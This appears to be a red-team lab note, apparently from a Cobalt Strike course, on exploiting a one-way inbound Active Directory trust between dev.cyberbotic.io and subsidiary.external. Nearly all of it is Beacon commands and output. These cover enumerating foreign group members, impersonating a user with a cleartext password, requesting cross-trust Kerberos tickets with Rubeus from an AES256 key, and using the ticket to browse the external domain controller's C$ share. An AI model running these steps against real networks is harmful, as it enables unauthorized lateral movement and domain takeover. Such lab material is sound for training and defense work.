# One Way (Inbound)

**dev.cyberbotic.io** has a one-way inbound trust with **subsidiary.external**.

```
beacon> powershell Get-DomainTrust

SourceName      : dev.cyberbotic.io
TargetName      : subsidiary.external
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : 
TrustDirection  : Inbound
WhenCreated     : 2/19/2021 10:50:56 PM
WhenChanged     : 2/19/2021 10:50:56 PM
```

```
beacon> powershell Get-DomainComputer -Domain subsidiary.external -Properties DNSHostName

dnshostname           
-----------           
ad.subsidiary.external

SharpHound -c DcOnly -d subsidiary.external
```

Enumerate Foreigners Users

```
beacon> powershell Get-DomainForeignGroupMember -Domain subsidiary.external

beacon> powershell ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
DEV\Subsidiary Admins
```

![](https://308507326-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F6twoQL4uXTWwvk3lNMue%2Fuploads%2FRDiewIGyINp5Nh7MM01e%2Fsubsidiary-foreign-group-member.png?alt=media\&token=c879bb71-41f2-4cce-b6da-6e1141c34b23)

```
# Validated the previous
beacon> powershell Get-NetLocalGroupMember -ComputerName ad.subsidiary.external

ComputerName : ad.subsidiary.external
GroupName    : Administrators
MemberName   : DEV\Subsidiary Admins
SID          : S-1-5-21-3263068140-2042698922-2891547269-1133
IsGroup      : True
IsDomain     : True
```

Authenticate using domain username and password

```
beacon> powershell Get-DomainGroupMember -Identity "Subsidiary Admins" | select MemberName

MemberName
----------
jadams

beacon> make_token DEV\jadams TrustNo1
[+] Impersonated DEV\bfarmer

beacon> ls \\ad.subsidiary.external\c$
```

Authenticate using kerberos tickets

```
# request tgt from the current domain
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgt /user:jadams /domain:dev.cyberbotic.io /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap
```

```
# request tgs from the current domain to the external domain
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgs /service:krbtgt/subsidiary.external /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io /ticket:doIFdD[...snip...]MuSU8= /nowrap
```

```
# request tgs using the previous tgs to the external domain and service
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe asktgs /service:cifs/ad.subsidiary.external /domain:ad.subsidiary.external /dc:ad.subsidiary.external /ticket:doIFMT[...snip...]5BTA== /nowrap
```

```
# Store the ticket
PS C:\> [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\subsidiary.kirbi", [System.Convert]::FromBase64String("doIFiD [...snip...] 5hbA=="))

beacon> make_token DEV\jadams FakePass
[+] Impersonated DEV\bfarmer

beacon> kerberos_ticket_use C:\Users\Daniel\Desktop\subsidiary.kirbi
beacon> ls \\ad.subsidiary.external\c$

beacon> rev2self
```